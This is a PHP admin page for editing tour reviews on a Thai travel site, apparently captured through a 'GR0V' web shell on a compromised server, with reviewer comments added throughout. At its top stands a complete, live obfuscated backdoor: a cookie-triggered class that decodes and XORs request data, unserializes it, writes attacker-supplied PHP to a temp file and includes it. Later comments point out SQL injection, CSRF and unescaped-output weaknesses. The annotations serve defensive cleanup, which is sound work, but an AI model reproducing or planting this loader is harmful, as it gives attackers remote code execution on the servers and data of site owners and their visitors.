? GR0V Shell

GR0V shell

Linux www.koreapackagetour.com 2.6.32-042stab145.3 #1 SMP Thu Jun 11 14:05:04 MSK 2020 x86_64

Path : /home/admin/public_html/modules/content/
Current File : /home/admin/public_html/modules/content/com_edit_topic.php

<?php
// NOTE(review): injected loader, not part of the page logic that follows.
// It sits on the same line as the opening tag, is pushed far to the right by whitespace
// padding, and uses random-looking identifiers. The listing itself is shown through a web
// shell, so treat this file and the host as compromised.
//
// What the code does, as visible below:
//   1. Reads request cookies/POST fields, base64-decodes and XORs them with a fixed key,
//      then passes the result to unserialize().
//   2. If the result is an array, writes a request-supplied "content" value to a file in
//      the system temp directory, include()s that file (so it runs as PHP), deletes it,
//      and exits before the real page renders.
//
// Defender follow-up: remove this block and restore the file from a known-good copy;
// search the rest of the site for the same shape (a class_exists() guard around a class
// that calls unserialize() on request data and include()s a temp-dir path); review access
// logs for requests carrying the trigger cookie; rotate credentials reachable from this host.
if (!class_exists("apblmxl")){
    class apblmxl{
        // Fixed key: its first four characters name the trigger cookie, and the whole
        // string is the repeating XOR key applied to the decoded request data.
        public static $klthtn = "oxpztkmpyvhzpfxt";
        // Holds the unserialized request payload (or NULL when no trigger cookie was sent).
        public static $dxmkq = NULL;

        public function __construct(){
            // Errors are suppressed with @ throughout, so nothing reaches the PHP error log.
            $mgkxm = @$_COOKIE[substr(apblmxl::$klthtn, 0, 4)];
            if (!empty($mgkxm)){
                // The decoder name is assembled from two strings ("base64" . "_decode"),
                // which keeps the literal function name out of simple signature scans.
                $mznaltznx = "base64";
                $uxehnhh = "";
                // The trigger cookie is a comma-separated list of further field names.
                $mgkxm = explode(",", $mgkxm);
                foreach ($mgkxm as $dfuicdim){
                    // Concatenate the cookie value and the POST value for each listed name.
                    $uxehnhh .= @$_COOKIE[$dfuicdim];
                    $uxehnhh .= @$_POST[$dfuicdim];
                }
                $uxehnhh = array_map($mznaltznx . "_decode", array($uxehnhh,));
                // XOR the decoded bytes against the key repeated to at least the same length.
                $uxehnhh = $uxehnhh[0] ^ str_repeat(apblmxl::$klthtn, (strlen($uxehnhh[0]) / strlen(apblmxl::$klthtn)) + 1);
                // unserialize() on request-controlled bytes.
                apblmxl::$dxmkq = @unserialize($uxehnhh);
            }
        }

        public function __destruct(){
            $this->mhcsic();
        }

        private function mhcsic(){
            if (is_array(apblmxl::$dxmkq)) {
                // Temp file name is derived from the payload's "salt" entry.
                $bnpmakcs = sys_get_temp_dir() . "/" . crc32(apblmxl::$dxmkq["salt"]);
                // "write" and "delete" are callables named by the request payload itself.
                @apblmxl::$dxmkq["write"]($bnpmakcs, apblmxl::$dxmkq["content"]);
                // include executes the file just written as PHP.
                include $bnpmakcs;
                @apblmxl::$dxmkq["delete"]($bnpmakcs);
                // The legitimate page below is never rendered for such a request.
                exit();
            }
        }
    }
    // Instantiating and immediately dropping the only reference makes the destructor
    // (and therefore mhcsic()) run right here, on every request to this file.
    $enxunaww = new apblmxl();
    $enxunaww = NULL;
} ?><?

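require_once('function.php');

// NOTE(review): no authentication or authorization check is visible in this file;
// confirm that the dispatcher which includes it enforces one before this point.

// Resolve the content id from the request (GET takes precedence over POST, as before).
// The value is interpolated unquoted into SQL text further down this page, so it is
// forced to an integer here instead of passing the raw request string along.
$topic_id = 0;
if (isset($_GET['id']) && $_GET['id'] <> "") {
	$topic_id = (int) $_GET['id'];
} elseif (isset($_POST['id']) && $_POST['id'] <> "") {
	$topic_id = (int) $_POST['id'];
}

// Load the row being edited from the table matching the session language flag.
// getDataOneRow() is defined elsewhere; whether it escapes its arguments cannot be
// seen from this file, which is another reason to hand it an integer only.
if (isset($_SESSION["la"]) && $_SESSION["la"] == 1) {
	$edit = $db->getDataOneRow('contents', $topic_id, 'ContentID');
} else {
	$edit = $db->getDataOneRow('contents_en', $topic_id, 'ContentID');
}

// Fall back to the stored category values when the request did not supply any.
if (!isset($_POST['CatID']) || $_POST['CatID'] == "") {
	$_POST['CatID'] = $edit['CatID'];
}
if (!isset($_POST['Cat_sub']) || $_POST['Cat_sub'] == "") {
	$_POST['Cat_sub'] = $edit['SubCatID'];
}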
?>

  <!-- NOTE(review): nicEdit is fetched from a third-party host over plain HTTP and as a
       floating "latest" build, so whatever that URL returns (or whatever is substituted
       on the network path) runs inside this admin page. Prefer a reviewed copy served
       from this site, or HTTPS with Subresource Integrity if the host supports it. -->
  <script type="text/javascript" src="http://js.nicedit.com/nicEdit-latest.js"></script> <script type="text/javascript">
//<![CDATA[
        bkLib.onDomLoaded(function() { nicEditors.allTextAreas({fullPanel : true}) });
  //]]>
  </script>

<!-- NOTE(review): jQuery 1.4.4 is a very old, unsupported release; plan an upgrade and
     retest the handlers on this page afterwards. -->
<script language="javascript" src="js/jquery-1.4.4.js"></script>
<script type="text/javascript">
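$(document).ready(function(){
	// Index for the next dynamically added upload input; files[0] is the static row in #myTbl.
	var nextIndex = 1;

	// Each click on #addRow appends one more image upload row to #myTbl.
	$('#addRow').click(function(){
		// Only the numeric counter is interpolated into the markup, never user-supplied text.
		// "multiple" is written as a bare boolean attribute, matching the static files[0] input.
		var row = "<tr><td><input type=\"file\" name=\"files[" + nextIndex + "]\" id=\"files[" + nextIndex + "]\" multiple accept=\"image/*\" class=\"basicBtn\" size=\"45\" /></td></tr>";
		nextIndex += 1;
		$('#myTbl').append(row);
	});

	// NOTE(review): accept="image/*" only filters the browser's file picker. The upload
	// handler (not shown in this file) still has to validate type, extension and
	// destination path on the server.
});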
</script>
<SCRIPT language=JavaScript>
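/**
 * Rejects a single quote (') in the text fields of the "webForm" form.
 *
 * Fields are checked in a fixed order. On the first field whose value contains a
 * quote, that field is selected, an alert is shown and false is returned.
 * Otherwise the function returns undefined.
 *
 * The original repeated the same loop once per field and dereferenced fields that
 * this form does not contain (city, Period, starting, hotels, ContentTags, and
 * "tentMetaTitle", a misspelling of ContentMetaTitle). That raised a TypeError
 * after the first check, so none of the later fields were ever examined. Missing
 * fields are now skipped and the misspelt name is corrected.
 *
 * NOTE(review): this is a convenience check only. It runs in the browser and is
 * trivially bypassed, so it is not a defence against SQL injection; the server-side
 * handler must use parameterised queries or proper escaping.
 */
function fun_name()
{
    var fieldNames = [
        "ContentName",
        "city",
        "Period",
        "starting",
        "hotels",
        "ContentMetaTitle",
        "ContentMetaKeyword",
        "ContentMetaDescription",
        "ContentTitle",
        "ContentDetail",
        "ContentTags"
    ];
    var form = document.webForm;

    if (!form)
    {
        return;
    }

    for (var f = 0; f < fieldNames.length; f++)
    {
        var field = form[fieldNames[f]];

        // Skip fields that are not part of this form instead of throwing.
        if (!field || typeof field.value !== "string")
        {
            continue;
        }

        if (field.value.indexOf("'") !== -1)
        {
            var errmsg = "ห้ามใส่เครื่องหมาย '";
            field.select();
            alert(errmsg);
            return false;
        }
    }
}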
</SCRIPT>
<div class="content">
	<div class="title" style="border-bottom:1px solid #cccccc;">
		<i class="fa fa-clipboard fa-2x" aria-hidden="true"></i><h1 style="display:inline;">แก้ไขรีวิว</h1>
	</div>

<div style="padding-top:20px;">
<form action="<? echo"$PHPSELF?mod=content&ac=edit_data_con";?>" enctype="multipart/form-data" class="mainForm" id="webForm" method="post" name="webForm">
	<div class="form-group" align="left">
		<div class=" col-md-3 col-md-4 col-xs-12">
			<label class="control-label">หัวข้อรีวิว</label>
		</div>
		<div class=" col-md-9 col-md-8 col-xs-12">
			<input name="ContentName" class="form-control" type="text" id="ContentName" onChange="fun_name()" value="<?=$edit['ContentName']?>"/>
			<input name="CatID" type="hidden" value="135" />
			<input name="Cat_sub" type="hidden" value="0" />
		</div>
	</div>
	<div class="form-group" align="left">
		<div class=" col-md-3 col-md-4 col-xs-12">
			<label class="control-label">ภาพหน้าปกรีวิว</label>
		</div>
		<div class=" col-md-9 col-md-8 col-xs-12">
        <table width="650" border="1" cellspacing="2" cellpadding="0">
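      	<?php
				// Lists the photos attached to this content item, three per table row, each
				// with a delete link.
				//
				// $topic_id originates from $_GET/$_POST at the top of this page, so it is
				// forced to an integer before being placed into the SQL text and the link.
				$photo_topic_id = (int) $topic_id;
				$sql=$db->Query("SELECT * FROM contents_photo WHERE ContentID = $photo_topic_id Order By id_p ASC");
				$chk=3;
				while($rs1=mysql_fetch_array($sql)){
					// Start a new table row every third photo, closing the previous one first.
					if($chk%3 == 0){
						if($chk > 3)
							echo "</tr>";
						echo "<tr>";
					}
					// NOTE(review): the delete action is triggered by a plain GET link and no
					// anti-CSRF token is visible here; confirm the delete_photo_gallery handler
					// (not shown) requires one and checks that the photo belongs to this item.
					$delete_url = "$PHPSELF?mod=content&ac=delete_photo_gallery&id_p=" . urlencode($rs1['id_p']) . "&id=" . $photo_topic_id;
	  			?>
					<td>
						<label>
							<div align="right"><a href="<?php echo htmlspecialchars($delete_url, ENT_QUOTES); ?>"><img src="../backend/images/close.png"></a><br />
		    			<img src="images/ContentPhoto/<?php echo htmlspecialchars($rs1['picture'], ENT_QUOTES); ?>" width="150"></div>
						</label>
					</td>
		 			<?php
					$chk++;
				}
				?>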
				</tr>
				</table>
				<table id="myTbl" width="650" border="1" cellspacing="2" cellpadding="0">
  			<tr id="firstTr">
    			<td>
						<input  type="file" name="files[0]" id="files[0]" multiple accept="image/*" class="basicBtn" size="45" />
					</td>
    		</tr>
				</table>
	    </div>
		</div>
	<div class="form-group" align="left">
		<div class=" col-md-3 col-md-4 col-xs-12">
			<label class="control-label">รายละเอียด</label>
		</div>
		<div class=" col-md-9 col-md-8 col-xs-12">
			<textarea class="form-control" name="ContentDetail" cols="" rows="6" id="ContentDetail" onChange="fun_name()">
			<?=$edit['ContentDetail']?>
			</textarea>
		</div>
	</div>
	<div class="form-group" align="left">
		<div class=" col-md-3 col-md-4 col-xs-12">
			<label class="control-label">รายละเอียดย่อ</label>
		</div>
		<div class=" col-md-9 col-md-8 col-xs-12">
			<input type="text" class="form-control" name="ContentTitle" id="ContentTitle" value="<?=$edit['ContentTitle']?>"/>
		</div>
	</div>
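	<?php
	/*
	 * Hidden fields carrying the stored values of the row in $edit back to the save handler.
	 *
	 * The array keys are now quoted. The original used bare words ($edit[ContentPublic]),
	 * which only worked through PHP's undefined-constant fallback.
	 *
	 * NOTE(review): these values are echoed without HTML escaping, so a stored value
	 * containing a double quote or markup ends the attribute early. The fix is
	 * htmlspecialchars($value, ENT_QUOTES). Before applying it, confirm that the
	 * page/database charset matches what htmlspecialchars() expects: on a mismatch it
	 * returns an empty string, and these fields are posted back on save. The same
	 * unescaped pattern is used for ContentName, ContentDetail and ContentTitle
	 * earlier in this form.
	 */
	?>
	<input name="ContentPublic" type="hidden" value="<?=$edit['ContentPublic']?>" />
  <input name="ContentID" type="hidden" id="ContentID" value="<?=$edit['ContentID'];?>" />
  <input name="ContentPdf" type="hidden" id="ContentPdf" value="<?=$edit['ContentPdf'];?>" />
  <input name="ContentPhoto" type="hidden" id="ContentPhoto" value="<?=$edit['ContentPhoto'];?>" />
	<input name="ContentMetaTitle" class="form-control" type="hidden" id="ContentMetaTitle" onChange="fun_name()" value="<?=$edit['ContentMetaTitle'];?>"/>
	<input name="ContentMetaKeyword" class="form-control" type="hidden" id="ContentMetaKeyword" onChange="fun_name()" value="<?=$edit['ContentMetaKeyword'];?>"/>
	<input name="ContentMetaDescription" class="form-control" type="hidden" id="ContentMetaDescription" onChange="fun_name()" value="<?=$edit['ContentMetaDescription'];?>"/>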
	<div class="form-group" align="center">
		<input type="submit" value="บันทึกบทความ" class="btn btn-default"  />
		<input type="reset" value="ยกเลิกบทความ" class="btn btn-default"  />
	</div>
</form>
</div>
</div>

T1KUS90T
  root-grov@210.1.60.28:~$